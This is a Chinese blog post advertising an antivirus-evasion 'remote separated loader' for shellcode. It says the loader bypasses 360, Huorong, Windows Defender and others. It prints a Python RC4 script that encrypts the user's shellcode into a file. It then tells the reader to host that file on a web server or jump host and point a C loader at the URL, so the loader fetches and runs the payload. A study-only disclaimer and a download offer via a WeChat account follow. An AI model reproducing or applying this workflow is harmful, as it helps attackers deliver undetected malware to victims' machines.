【护网必备】木马免杀之远程分离加载器

项目介绍

此项目是一个简单的远程分离的加载器,免杀国内大部分杀软(360、火绒、Windows Defender、金山毒霸、电脑管家)

项目使用

Step 1:修改Encryption/payload_c_x64.py的24行,改为自己的shellcode


def rc4_encrypt(data, key):
    S = list(range(256))
    j = 0

    # Key-scheduling algorithm (KSA)
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # Pseudo-random generation algorithm (PRGA) & encryption
    i = j = 0
    result = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        result.append(byte ^ k)

    return result

def main():
    # 原始的payload(cale.exe)
    payload = b"你的shellcode"
    # 加密密钥
    key = b"thisIsA16ByteKey"  # 16字节密钥

    # 使用RC4算法加密payload
    encrypted_payload = rc4_encrypt(payload, key)

    # 将加密的payload写入文件
    with open("result.txt", "wb") as file:
        file.write(encrypted_payload)

    print("加密后的payload已写入result.txt")

if __name__ == "__main__":
    main()

Step 2:运行python脚本(环境python3.6)

Step 3:将生成的result.txt上传到Web端(OSS、跳板等机器)

Step 3:copy自己的地址,例如:http://example.org,随后将http://example.org替换ShellCodeLoader/Source.c 的152行,生成64位发行版即可

查杀测试

360查杀:

window defender查杀:

金山火绒查杀:

免责声明

项目仅供进行学习研究,切勿用于任何非法未授权的活动,如个人使用违反安全相关法律,后果与本人无关。

下载地址

点击下方名片进入公众号

回复关键字【240620】获取下载链接

  • 20
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值